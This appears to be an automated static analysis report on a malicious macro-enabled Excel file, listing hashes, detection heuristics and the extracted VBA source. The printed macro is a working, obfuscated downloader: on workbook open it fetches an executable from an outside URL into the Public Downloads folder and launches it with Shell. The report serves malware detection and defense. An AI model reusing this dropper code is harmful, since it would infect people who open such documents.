Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a2e5a787d6cf73f1…

MALICIOUS

Office (OOXML)

222.7 KB First seen: 2020-11-23
MD5: d32c6fcb78ecab1c517cd38e833cb581 SHA-1: 7bbc877753983b113ffeddd9dc212def53f75599 SHA-256: a2e5a787d6cf73f13befa276ee28cbfc13ee8bebee108c43f68c25b49334e9ff
150 Risk Score

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm = Shell(xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu, vbNormalNoFocus)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://piratesmoker.com/purchase%20order/Purchase%20Order.exe Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3445 bytes
SHA-256: 9677af8b0408f2cb4c39f187b25a7952b1d608b13ed9c313d3ca32405b352865
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function xdljzznjfyvhosbzyucajwihqxlyywiraanome Lib "urlmon" _
Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _
ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Private Sub Workbook_Open()
Range("A1:G15").Select
Selection.FormatConditions.AddColorScale ColorScaleType:= 3
Selection.FormatConditions(Selection.FormatConditions.Count).SetFirstPriority
Selection.FormatConditions(1).ColorScaleCriteria(1).Type = _
xlConditionValueLowestValue
iywwlyjlabxwkihwutljtydeqfvyu
With Selection.FormatConditions(1).ColorScaleCriteria(1).FormatColor
.Color = 8109667
.TintAndShade = 0
End With
End Sub
Public Sub iywwlyjlabxwkihwutljtydeqfvyu()
Selection.FormatConditions(1).ColorScaleCriteria(2).Type = _
xlConditionValuePercentile
Selection.FormatConditions(1).ColorScaleCriteria(2).Value = 50
With Selection.FormatConditions(1).ColorScaleCriteria(2).FormatColor
.Color = 8711167
.TintAndShade = 0
End With
Selection.FormatConditions(1).ColorScaleCriteria(3).Type = _
xlConditionValueHighestValue
With Selection.FormatConditions(1).ColorScaleCriteria(3).FormatColor
.Color = 7039480
.TintAndShade = 0
End With
yzcxlhawtixrzkqmpnrtbuixbmnvrfeu = "http://piratesmoker.com/purchase%20order/Purchase%20Order.exe"
ActiveCell.FormulaR1C1 = "12"
Range("F2").Select
xdljzznjfyvhosbzyucajwihqxlyywiraanome 0,yzcxlhawtixrzkqmpnrtbuixbmnvrfeu,"C:\Users\Public\Downloads\" +"chrdtymemnnycbulxahbhhackrynkjnebttdolbifypac.exe",0,0
ActiveCell.FormulaR1C1 = "12"
Range("E3").Select
Dim eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm As Variant
ActiveCell.FormulaR1C1 = "15"
Range("C4").Select
Dim xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu As String
ActiveCell.FormulaR1C1 = "14"
Range("C5").Select
xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu = "C:\Users\Public\Downloads\"+"chrdtymemnnycbulxahbhhackrynkjnebttdolbifypac.exe"
ActiveCell.FormulaR1C1 = "56"
Range("A6").Select
ActiveCell.FormulaR1C1 = "45"
Range("A3").Select
ActiveCell.FormulaR1C1 = "15"
eenddiantbqdfsawmmtfqbyuvbkvsggdkrvwjshzhjasvfngchdsctedgticyevnuntowdmuftyhbfypndskcnaqnsqpkebcnm = Shell(xhlzjzvjmjvwbavtpulklhndbenwkarvtphrdnutpsaruqrqu, vbNormalNoFocus)
Range("F5").Select
ActiveCell.FormulaR1C1 = "21"
Range("D7").Select
ActiveCell.FormulaR1C1 = "21"
Range("D10").Select
ActiveCell.FormulaR1C1 = "12"
Range("B11").Select
ActiveCell.FormulaR1C1 = "155"
Range("B10").Select
ActiveCell.FormulaR1C1 = "64485"
 Range("B9").Select
ActiveCell.FormulaR1C1 = "1"
Range("B3").Select
ActiveCell.FormulaR1C1 = "15546"
Range("D2").Select
ActiveCell.FormulaR1C1 = "15"
Range("D3").Select
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
End Sub

Attribute VB_Name = "lwkjqjdasoihbxfrmvotkjotfxlrwgb"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes
SHA-256: 3666517750ffe8280b491977edcab295296047bf5732ed7cbbdf572e4cac7f4a

Open this report in the interactive analyzer, or submit your own file for analysis.